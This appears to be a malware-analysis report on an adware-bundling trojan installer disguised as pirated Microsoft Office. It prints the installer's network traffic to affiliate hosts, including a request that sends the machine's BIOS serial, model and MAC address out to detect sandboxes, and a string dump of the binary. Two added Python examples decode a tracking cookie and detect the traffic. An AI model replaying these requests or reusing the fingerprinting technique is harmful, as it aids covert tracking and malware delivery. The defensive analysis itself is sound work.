POST hXXp://kiss.oatmealscene.loan/installer.php?affId=1006&instId=11&ho_trackingid=HO3360345515acc5833a96a6&trackingId=336034551&cc=UA&untracked=&uac=1&osd=1601&net=4.5.50709&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: kiss.oatmealscene.loan
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 212

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1118540&id[]=1118541&id[]=453683&id[]=453684&id[]=453685&id[]=453686&id[]=686787&id[]=686788&id[]=686789&id[]=686790&id[]=856042&id[]=856043&id[]=856338&id[]=856339
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Set-Cookie: PHPSESSID=1q59jtmvnkqoaufrreb3gmb6s5; path=/
Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjF9LFwidGltZVwiOjE1MjMzNDEzNjF9In0.L7TibYFb2iXT8_maK2fQtsi7dovoKKFZMlsECMOviwg; expires=Fri, 11-May-2018 06:22:44 GMT; path=/; domain=.kiss.oatmealscene.loan
Date: Tue, 10 Apr 2018 06:22:44 GMT
Connection: close
Content-Length: 43992
[binary body: 43992 bytes of non-text data returned under Content-Type: text/html; not reproduced]

<<< skipped >>>
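
The second cookie set by kiss.oatmealscene.loan (the one whose name is a 40-hex-character label, also set by lip.healthcakes.men further down) is a three-segment JWT: base64url header, base64url payload, HS256 signature. The Python below is an added worked example, not part of the report or of the installer; it decodes the cookie as captured above to show what the affiliate server is tracking. It cannot verify the signature (the HMAC key is server-side, so the signature is only recorded), and the field names it reports (campaigns, time) come straight from the decoded payload, which nests a JSON string inside JSON.

```python
import base64
import json
from datetime import datetime, timezone

# Set-Cookie value copied from the kiss.oatmealscene.loan response above.
CAPTURED_SET_COOKIE = (
    "a862a6096792e35ad3375e3a94312fe4ba1df5aa="
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjF9LFwidGltZVwiOjE1MjMzNDEzNjF9In0."
    "L7TibYFb2iXT8_maK2fQtsi7dovoKKFZMlsECMOviwg; "
    "expires=Fri, 11-May-2018 06:22:44 GMT; path=/; domain=.kiss.oatmealscene.loan"
)


def b64url_decode(segment):
    """Decode a base64url segment, restoring the padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def split_jwt_cookie(set_cookie):
    """Return (cookie_name, token) from a raw Set-Cookie header value."""
    name_value = set_cookie.split(";", 1)[0]
    name, value = name_value.split("=", 1)
    return name.strip(), value.strip()


def inspect_jwt(token):
    """Decode header and payload of a JWT WITHOUT verifying the signature.

    The signing key lives on the affiliate server, so the signature can only
    be recorded. This server's payload keeps its real content as a JSON
    string under "data"; that inner string is parsed as well so the epoch
    values become usable.
    """
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    inner = payload.get("data")
    if isinstance(inner, str):
        payload["data"] = json.loads(inner)
    return {
        "header": header,
        "payload": payload,
        "signature_hex": b64url_decode(signature_b64).hex(),
    }


def campaign_times(info):
    """Render every epoch value in the payload as UTC for the incident timeline."""
    data = info["payload"]["data"]
    out = {"time": datetime.fromtimestamp(data["time"], timezone.utc).isoformat()}
    for cid, ts in data.get("campaigns", {}).items():
        out["campaign_" + cid] = datetime.fromtimestamp(ts, timezone.utc).isoformat()
    return out


if __name__ == "__main__":
    name, token = split_jwt_cookie(CAPTURED_SET_COOKIE)
    info = inspect_jwt(token)
    print(name)
    print(info["header"], info["payload"])
    print(campaign_times(info))
```

The decoded epoch values sit two seconds before the response's own Date header, and the cookie set by the later report.php calls carries a value two seconds later again with a different signature, so the server re-issues the token on every call rather than echoing the client's copy; comparing the payloads across the capture is enough to reconstruct the order of the installer's requests even when the sandbox log loses it.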

GET /stats.php?bu=cp&c=&step= HTTP/1.0
Host: gold.powerstring.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Tue, 10 Apr 2018 06:22:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 de756dc86b5525fda1e402d7ed00c815.cloudfront.net (CloudFront)
X-Amz-Cf-Id: H8qFctmN9HXEelLsz4aQASLcQgS3pjVoOvobY33j9SNrZdmQ3iLibQ==


GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: ic-dc.bundlessafevault.com
Connection: Keep-Alive


HTTP/1.1 403 Forbidden
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Date: Tue, 10 Apr 2018 06:21:51 GMT
Server: AmazonS3
Age: 54
X-Cache: Error from cloudfront
Via: 1.1 556e1e002dcf7a95ee196fc550f9ea94.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 4ReO9sAkip6DkGFFDypOclfT2-kSIskHsLfne-f1bunLWkdVfNOXwQ==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code
>AccessDenied</Code><Message>Access Denied</Message&
gt;<RequestId>5D783F578D1E95C4</RequestId><HostId>MA
1405O5N8PLlmaCgC8285EY8YRPQSKEkn6sFoxtsi44fXn2IxFsTXmzI0uUjx5a6OAzaE/x
e1A=</HostId></Error>..0..


GET /pr/public/js/jquery.min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.bundlessafevault.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 86351
Connection: keep-alive
Date: Mon, 20 Nov 2017 05:09:05 GMT
Last-Modified: Sun, 07 Aug 2016 11:30:34 GMT
ETag: "05e51b1db558320f1939f9789ccf5c8f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 3559
X-Cache: Hit from cloudfront
Via: 1.1 3fd65a3304273a3a309254dd830aec6c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Qj5m-Xave1x56W8GZoARgR00DE82k9B4PBcZUn9xjszALgDlVyQBAw==
/*! jQuery v3.1.0 | (c) jQuery Foundation | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.0",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null!=a?a<0?this[a+this.length]:this[a]:f.call(this)},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=functi

<<< skipped >>>

GET /files135/65/10390/120492/FB_RU_800_Icons2.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.1-1ads.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld=
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: irncdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 10 Apr 2018 06:22:45 GMT
Content-Type: image/jpeg
Content-Length: 97369
Connection: keep-alive
Access-Control-Allow-Origin: *
Last-Modified: Tue, 28 Feb 2017 14:24:48 GMT
Server: CDN77-Turbo
X-Edge-IP: 185.180.12.10
X-Edge-Location: viennaAT
X-Cache: HIT
X-Age: 292334
[JPEG body, 97369 bytes; the Exif/XMP header is reproduced below, the image data is not]
<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">
 <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:F65B7BCC06FC11E69887BD153D44D083" xmpMM:DocumentID="xmp.did:F65B7BCD06FC11E69887BD153D44D083">
   <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F65B7BCA06FC11E69887BD153D44D083" stRef:documentID="xmp.did:F65B7BCB06FC11E69887BD153D44D083"/>
  </rdf:Description>
 </rdf:RDF>
</x:xmpmeta>
<?xpacket end="r"?>

<<< skipped >>>

GET /impression.gif?b=120492&p=5103&c=10390&h=177a937b0d9a7a39eee4f1dd260ad305&l=UA&sh=800&sw=1280&ad.trans.id=xtjmf1cl4aok&cps=Y2hhbg*~dnRs*~Y3Jy*~ZXhsZA*&s=03e8cba91683911ccd51608978f73922&t=1523341365531 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.1-1ads.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld=
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.1-1ads.com
Connection: Keep-Alive
Cookie: UUID=9524ab60-3c87-11e8-9a86-3c4a92ef4778


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: ucv=10390-UA-1523427765646-24--; Domain=.VVV.1-1ads.com; Expires=Wed, 10-Apr-2019 06:22:45 GMT; Path=/
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 43
Date: Tue, 10 Apr 2018 06:22:44 GMT
GIF89a.............!.......,...........D..;


GET /report.php?typ=conversion&transId=336034551&affId=1006&instId=11&ho_transId=HO3360345515acc5833a96a6&s1=539&s2=18778101&s3=&s4=LP_DEF&s5=1326407960&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.6357091785874339 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: kiss.oatmealscene.loan


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Set-Cookie: PHPSESSID=6lp7df2bqo98bbii6c3doqer35; path=/
Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjN9LFwidGltZVwiOjE1MjMzNDEzNjN9In0.NcuBqk74QFlc1AADR78uMKoGC7sniqdj7Z_9MC7m-fY; expires=Fri, 11-May-2018 06:22:46 GMT; path=/; domain=.kiss.oatmealscene.loan
Date: Tue, 10 Apr 2018 06:22:45 GMT
Content-Length: 0


GET /pr/public/js/adframe.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.s3.amazonaws.com
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: XODLjIS5cJhIykotlmwkyWFe4/rxg2ebSWRbBfXKV9RmJdEdG73Aws2ImR1jPEViL09+eYVhIqM=
x-amz-request-id: 88F2718C43083057
Date: Tue, 10 Apr 2018 06:22:46 GMT
Last-Modified: Mon, 09 Jan 2017 12:15:17 GMT
ETag: "0d5ff84418e11098019c392f6c85729e"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 23
Server: AmazonS3
window.adsAreOk = true


GET /pr/public/js/detector.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.bundlessafevault.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 2194
Connection: keep-alive
Date: Mon, 26 Mar 2018 06:45:31 GMT
Last-Modified: Mon, 26 Mar 2018 06:44:30 GMT
ETag: "4e3b3271a30d8939350ace1584358785"
x-amz-meta-cb-modifiedtime: Tue, 06 Mar 2018 13:48:43 GMT
Accept-Ranges: bytes
Server: AmazonS3
Age: 84999
X-Cache: Hit from cloudfront
Via: 1.1 efa4b16c2431de1cbf500664e6fcd4bc.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1fP9ekapmcjP5DO3J5w_sfTX--lPdmOxQZY-MrAMR-qoJnPJnVFsBw==
$(document).ready(function() {
	if (!window.adsAreOk || !window.adsAreOk2) {
		console.log("no ads for us");
		var link = window.link || "hXXps://freecoolapps.com/v2/?ac=ds";
		$(".content")
			.find("[class^=inner]")
			.css({
				display: "block"
			})
			.append(
				'<div class="blocked_box">' +
				'<a href="' + link + '"><img src="../public/img/recommended_chromium.jpg"></a> ' +
				"</div>"
			);
		// Stylizing the newly created box
		var box = $(".blocked_box");
		box.css({
			position: "absolute",
			top: "0",
			left: "0",
			width: "100%",
			height: "100%"
		});
		box.find("a img").css({
			maxHeight: "100%"
		});
	} else {
		var QueryString = (function() {
			var query_string = {};
			var query = window.location.search.substring(1);
			var vars = query.split("&");
			for (var i = 0; i < vars.length; i++) {
				var pair = vars[i].split("=");
				if (typeof query_string[pair[0]] === "undefined") {
					query_string[pair[0]] = decodeURIComponent(pair[1]);
				} else if (typeof query_string[pair[0]] === "string") {
					var arr = [query_string[pair[0]], decodeURIComponent(pair[1])];
					query_string[pair[0]] = arr;
				} else {
					query_string[pair[0]].push(decodeURIComponent(pair[1]));
				}
			}
			return query_string;
		})();
		var isExlgG = function (str) {
			var g = 10-(str[0]/str[2])==str[1];
			return g;

<<< skipped >>>

GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=HO3360345515acc5833a96a6&transId=336034551&chk_s_b=VMware-56 4d a7 48 b6 81 1f 90-3f 36 cc ce af 92 9a d2&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:3C:AC:7120:41:53:59:4E:FF&randid=0.0000717088943324451 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: kiss.oatmealscene.loan


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Set-Cookie: PHPSESSID=v0bn1urf6tqst2lj3ogatho5h6; path=/
Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjN9LFwidGltZVwiOjE1MjMzNDEzNjN9In0.NcuBqk74QFlc1AADR78uMKoGC7sniqdj7Z_9MC7m-fY; expires=Fri, 11-May-2018 06:22:46 GMT; path=/; domain=.kiss.oatmealscene.loan
Date: Tue, 10 Apr 2018 06:22:45 GMT
Content-Length: 0


GET /normal_bg4.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 63855
Connection: keep-alive
Date: Sun, 19 Nov 2017 03:31:01 GMT
Last-Modified: Wed, 25 Oct 2017 07:20:00 GMT
ETag: "0f4f3c2685f4c75717b342a34fe59423"
Accept-Ranges: bytes
Server: AmazonS3
Age: 6098
X-Cache: Hit from cloudfront
Via: 1.1 13adfd3cd52fe37e43fe8d963a13d770.cloudfront.net (CloudFront)
X-Amz-Cf-Id: cc4sx98bd3tJ8PPWNaZUCrsDBDdXvlR1dufh2rG5njzqJ-TjBiYkuw==
[PNG body, 63855 bytes of image data; not reproduced]

<<< skipped >>>

GET hXXp://lip.healthcakes.men/offer.php?affId=1006&trackingId=336034551&instId=11&ho_trackingid=HO336034551&cc=UA&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3&net=4.5.50709&ie=9.0.8112.16421&res=1276x846&osd=1601 HTTP/1.1
Host: lip.healthcakes.men
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 1936
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Set-Cookie: PHPSESSID=5ov882bm7vq5df7jc1i2jko690; path=/
Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjF9LFwidGltZVwiOjE1MjMzNDEzNjF9In0.L7TibYFb2iXT8_maK2fQtsi7dovoKKFZMlsECMOviwg; expires=Fri, 11-May-2018 06:22:43 GMT; path=/; domain=.lip.healthcakes.men
Date: Tue, 10 Apr 2018 06:22:43 GMT
X-Cache: Miss from cloudfront
Via: 1.1 d8c162bb2dd82a85311051ee4bb3f5d2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: M4cbPci_b3c-3Y4bDtTsEUeSPkjMOJYlqeTazJCXkKClWJlVpIAgRg==
[binary body: 1936 bytes of non-text data returned under Content-Type: text/html; not reproduced]

<<< skipped >>>
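
Two things in the traffic above survive the rotating .loan/.bid/.men hostnames: the fixed User-Agent strings (InstallCapital, NSISDL/1.2 (Mozilla), and NSIS_Inetc (Mozilla) from the string dump) and a small set of PHP endpoints, plus the report.php?typ=sys call that ships the host's BIOS serial, manufacturer, model and MAC addresses back to the affiliate (VMware values here, so the installer can tell it is running in a sandbox). The Python below is an added detection example and not part of the report: it runs that logic over a constructed proxy log. The log format, the weights and the alert threshold are assumptions; three of the URLs are lifted from the capture with their spaces percent-encoded (and the chk_s_b and chk_mac values shortened) so the lines parse. VMware's MAC prefix 00:50:56 is used to recognise the virtual adapter.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators copied from the capture above. Affiliate hostnames rotate, so
# the rule keys on the fixed user-agent strings, the PHP endpoint names and
# the host-profile parameters rather than on domains.
INSTALLER_USER_AGENTS = {"InstallCapital", "NSISDL/1.2 (Mozilla)", "NSIS_Inetc (Mozilla)"}
INSTALLER_PATHS = {"/installer.php", "/offer.php", "/report.php", "/stub_maker.php", "/stats.php"}
FINGERPRINT_PARAMS = ("chk_s_b", "chk_s_v", "chk_c_ma", "chk_c_mo", "chk_mac")
VMWARE_OUI = "00:50:56"   # MAC prefix assigned to VMware

# Assumed scoring: a bare endpoint name is weak (benign sites have report.php
# too); the user-agent or the exfiltrated host profile is enough on its own.
WEIGHTS = {"ua": 3, "path": 1, "fingerprint": 3, "vm": 2}
ALERT_THRESHOLD = 3

# Constructed proxy log (not from the report): timestamp, client, method,
# URL, quoted user-agent. The first three requests reuse URLs from the
# capture with spaces percent-encoded; the last two are benign filler.
SAMPLE_LOG = """\
2018-04-10T06:22:44Z 10.0.0.5 POST http://kiss.oatmealscene.loan/installer.php?affId=1006&instId=11&cc=UA&uac=1&v=3 "InstallCapital"
2018-04-10T06:22:44Z 10.0.0.5 GET http://gold.powerstring.bid/stats.php?bu=cp&c=&step= "NSISDL/1.2 (Mozilla)"
2018-04-10T06:22:45Z 10.0.0.5 GET http://kiss.oatmealscene.loan/report.php?typ=sys&affId=1006&chk_s_b=VMware-56%204d%20a7%2048&chk_c_ma=VMware,%20Inc.&chk_c_mo=VMware%20Virtual%20Platform&chk_mac=00:50:56:3C:AC:71 "InstallCapital"
2018-04-10T06:23:01Z 10.0.0.7 GET https://www.example.com/report.php?typ=weekly "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/59.0"
2018-04-10T06:23:05Z 10.0.0.7 GET https://cdn.example.com/js/jquery.min.js "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/59.0"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse_log_line(line):
    """Turn one log line into a request record, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, ua = m.groups()
    u = urlsplit(url)
    return {"ts": ts, "client": client, "method": method, "host": u.hostname,
            "path": u.path, "query": parse_qs(u.query), "ua": ua}


def vm_fingerprint(query):
    """Pull the chk_* host-profile fields and decide whether they describe a VM.

    Returns (fields, looks_virtual). A hypervisor name in the BIOS serial,
    manufacturer or model, or a VMware OUI in chk_mac, counts as virtual.
    """
    fields = {k: query[k][0] for k in FINGERPRINT_PARAMS if k in query}
    text = " ".join(fields.values()).lower()
    looks_virtual = "vmware" in text or fields.get("chk_mac", "").upper().startswith(VMWARE_OUI)
    return fields, looks_virtual


def classify(rec):
    """Score one request against the installer profile; return (score, reasons)."""
    score, reasons = 0, []
    if rec["ua"] in INSTALLER_USER_AGENTS:
        score += WEIGHTS["ua"]
        reasons.append("installer user-agent " + rec["ua"])
    if rec["path"] in INSTALLER_PATHS:
        score += WEIGHTS["path"]
        reasons.append("affiliate endpoint " + rec["path"])
    fields, virtual = vm_fingerprint(rec["query"])
    if fields:
        score += WEIGHTS["fingerprint"]
        reasons.append("host profile sent: " + ", ".join(sorted(fields)))
    if virtual:
        score += WEIGHTS["vm"]
        reasons.append("profile describes a VM (sandbox check)")
    return score, reasons


def scan(log_text):
    """Return the requests whose score reaches ALERT_THRESHOLD."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        score, reasons = classify(rec)
        if score >= ALERT_THRESHOLD:
            hits.append({"ts": rec["ts"], "client": rec["client"], "host": rec["host"],
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["host"], "score=%d" % hit["score"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The benign example.com/report.php request scores 1 and stays below the threshold, which is the point of weighting endpoint names low: the user-agent and the chk_* host profile are what make the installer traffic distinctive, and a sys report whose fields describe the analysis VM is worth flagging on its own because it tells you the installer had the data it needs to behave differently outside the sandbox.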

The Trojan connects to the servers at the following location(s):

%original file name%.exe_4000:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
hu2.iu
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe
d=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe
ip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B
etc.dll
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
DigiCert Inc1
VVV.digicert.com1 0)
"DigiCert High Assurance EV Root CA0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
VVV.digicert.com1200
)DigiCert High Assurance Code Signing CA-10
(hXXp://crl3.digicert.com/ha-cs-2011a.crl0.
(hXXp://crl4.digicert.com/ha-cs-2011a.crl0
.hXXp://VVV.digicert.com/ssl-cps-repository.htm0
hXXp://ocsp.digicert.com0P
DhXXp://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
hXXp://ocsp.digicert.com0I
=hXXp://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
:hXXp://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0@
:hXXp://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
)DigiCert High Assurance Code Signing CA-1
1f.WU
System.dll
callback%d
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp
nsb5D9C.tmp
s\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe
ROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\VVBX80bLVD
p&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
ke.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
c:\%original file name%.exe
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9B.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
201804100622
